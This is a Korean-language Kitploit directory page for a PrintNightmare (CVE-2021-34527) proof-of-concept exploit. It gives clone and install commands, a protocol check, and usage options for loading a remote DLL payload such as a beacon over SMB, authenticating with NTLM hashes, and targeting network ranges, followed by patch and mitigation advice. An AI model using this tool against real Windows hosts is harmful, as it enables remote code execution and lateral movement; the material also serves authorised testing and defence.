Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-34527 — PrintNightmare (CVE-2021-34527) PoC 익스플로잇 | Kitploit
도구/GitHubGitHub/m8sec/cve-2021-34527
Privilege EscalationPayload GenerationVulnerability AnalysisExploitationLateral MovementPenetration Testing
GitHubm8sec/cve-2021-34527

CVE-2021-34527

PrintNightmare (CVE-2021-34527) PoC 익스플로잇

저장소 보기
118193년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

PrintNightmare (CVE-2021-34527)

이 PrintNightmare 익스플로잇 버전은 Cube0x0이 만든 코드를 기반으로 하며, 다음 기능을 제공합니다:

  • 여러 호스트를 대상으로 지정할 수 있습니다.
  • 페이로드 전달을 위한 내장 SMB 서버가 포함되어 있어 공개 파일 공유가 필요 없습니다.
  • 익스플로잇에는 MS-RPRN 및 MS-PAR 프로토콜이 모두 포함되어 있습니다 (CMD 인자에서 정의).
  • @gentilkiwi의 UNC 우회 기술을 구현합니다.

Installation

실행 전에 최신 버전의 impacket을 설치하세요:

root@kitploit:~
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
python3 setup install

git clone https://github.com/m8sec/CVE-2021-34527
cd CVE-2021-34527
python3 CVE-2021-34527.py -h

Test

Impacket의 rpcdump.py를 사용하여 MS-PAR 및 MS-RPRN 프로토콜을 확인할 수 있습니다:

root@kitploit:~
>> rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

또는 byt3bl33d3r의 스캐너 ItWasAllADream을 사용하여 대상을 스캔하고 PrintNightmare RCE 취약점을 검증할 수 있습니다.

Screenshots

pnm

Usage

root@kitploit:~
  -v VERBOSE            Enable verbose logging from SMB server
  -t TIMEOUT            Connection timeout

Authentication:
  -u USERNAME           Set username
  -H HASH, -hashes      Use NTLM Hash for authentication
  -p PASSWORD           Set password
  -d DOMAIN             Set domain
  --local-auth          Authenticate to target host, no domain

DLL Execution:
  -dll DLL                  Path to local DLL file to execute "beacon.dll"
  --remote-dll REMOTE_DLL   Remote dll "\\192.168.1.25\Share\beacon.dll"
  -share SHARE              Set local SMB share name
  --local-ip LOCAL_IP       Set local IP (defaults to primary interface)

Target(s):
  -pDriverPath PDRIVERPATH  Define Driver path. Example 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
  -port [destination port]  Destination port to connect to SMB Server
  -proto {MS-RPRN,MS-PAR}   Target protocol (Default=MS-RPRN)
  target                    192.168.2.2, target.txt, 10.0.0.0/24 (positional)

Remediation

Microsoft는 PrintNightmare에 대한 여러 패치를 출시했으며, 가장 최근 패치는 2021년 9월 Patch Tuesday에 공개되었습니다. 이 패치는 근본적인 취약점과 이후 발견된 해결 방법을 해결했습니다. 자세한 내용은 Microsoft 공식 지침을 참조하세요:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

이 취약점을 완화하기 위한 추가 전략은 다음과 같습니다:

  • 필수가 아닌 시스템에서 Print Spooler 서비스를 비활성화합니다.
  • 그룹 정책(Group Policy)을 통한 인바운드 원격 인쇄를 비활성화합니다.

Acknowledgement

  • @cube0x0 - Python exploit 코드와 impacket 프로젝트에 대한 기여에 감사드립니다.
  • @edwardzpeng 및 @lxf02942370- PrintNightmare의 최초 발견 및 익스플로잇에 기여해 주셨습니다.
도구 다운로드